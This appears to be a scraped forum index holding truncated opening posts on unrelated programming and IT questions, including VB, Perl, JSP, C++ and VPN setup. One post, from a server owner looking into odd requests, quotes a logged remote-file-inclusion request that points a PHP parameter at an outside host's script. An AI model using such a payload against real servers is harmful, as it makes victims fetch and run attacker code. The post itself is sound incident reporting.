Hi
I am trying to use the internet transfer control to send some data to a
site. I want my MS ISA proxy server to keep the connection alive. What
syntax should I use to send the 'keep alive' data to the proxy server? Is
any of the following any good?
objInet.Execute "http://wwww.mysite.com", "POST", "Some Data",
"Content-Type: application/x-www-form-urlencoded Proxy-Connection:
Keep-Alive" & vbCrLf

Hi All,
I have created a class that references
MS Word. The class will happily control
Word, adding text, etc.
However, when I have finished with the VB
app I want to close the app, but not Word
so that user can continue on their own.

Hi All,
I have a form that uses Javascript to validate some fields. Whe the
user selects to submit the form with certain values selected, I want to
be able to execute a Perl script, query the MySQL database to get my
resuts and return an ALERT box to the user if his form input was
invalid.
Problem is, I do not want to change the screen. I just want the dialog
to pop up. I am very good at Perl, but I'm less than a novice at

There were some strange requests to my server asking for config.php
file (which I do not have in the requested location).
I did some investigation. Seems to be a virus written in perl,
exploiting a vulnerability in php code.
The requests are like this
216.120.231.252 - - "GET /algebra/about/history/config.php?returnpath=http://domates.1gig.biz/spread.txt? HTTP/1.1" 404 561 "-" "libwww-perl/5.805"

I have a problem with keeping a page alive while the server is writing large xml files to Oracle. The server time out is set to 15 minutes. I need a programmatic way to keep the jsp connection going for files that take longer. The web page displays errors and warnings that are found in the data validation process. The xml files are written to the server prior to inserting into Oracle. Sending an email back to the users with an error report...

Greetings!
I thought I'd add a little something to a web site, a "tip of the week," and wanted it automated so that if I get hit by a truck (or, more likely, am forgetful), the tip is updated automatically.
I learned enough Perl (read: just enough) to code a script that does what I want it to do. Now the question is: how to get it to run automatically.
I would like the program to be invoked when someone, anyone, hits my homepage. I...

We're using a perl script to fetch images from the inhouse server & pump them to a remote server with much higher bandwidth.
I want to remove the Everyone account from the target folder on the remote server, so users may only access it with username & password. When I do this, the perl script stops working. I can only assume the perl script is operating under the Everyone account.
How do I change the functionality so that the Everyone...

Note: You may skip to the end of the article if all you want is the perl code.
Introduction
Many websites have a form or a link you can use to download a file. You click a form button or click on a link and after a moment or two a file download dialog box pops-up in your web browser and prompts you for some instructions, such as “open” or “save“. I’m going to show you how to do that using a perl script.
What You Need

Hello folks,
I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>".
The problem is that using the GNU compilers, it seems that the internal comparison operator "<=>" tries to promote arguments from unsigned to signed.
This is as boiled down as I can make it.
Here is my compilation command:
g++-12 -std=c++20 -Wnarrowing bit_field.cpp
Here is the code in...

Overview:
Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows Update option using the Control Panel or Settings app; it automatically checks for updates and installs any it finds, whether you like it or not. For most users, this new feature is actually very convenient. If you want to control the update process,...

The next Access Europe User Group meeting will be on Wednesday 1 May 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM).
In this session, we are pleased to welcome a new presenter, Adolph Dupré who will be discussing some powerful techniques for using class modules.
He will explain when you may want to use classes instead of User Defined Types (UDT). For example, to manage the data in unbound forms.
Adolph will...

Hello
I'm a network technician in training and I need your help.
I am currently learning how to create and manage the different types of VPNs and I have a question about LAN-to-LAN VPNs.
The last exercise I practiced was to create a LAN-to-LAN VPN between two Pfsense firewalls, by using IPSEC protocols.
I succeeded, with both firewalls in the same network. But I'm wondering if it's possible to do the same thing, with 2 Pfsense firewalls...
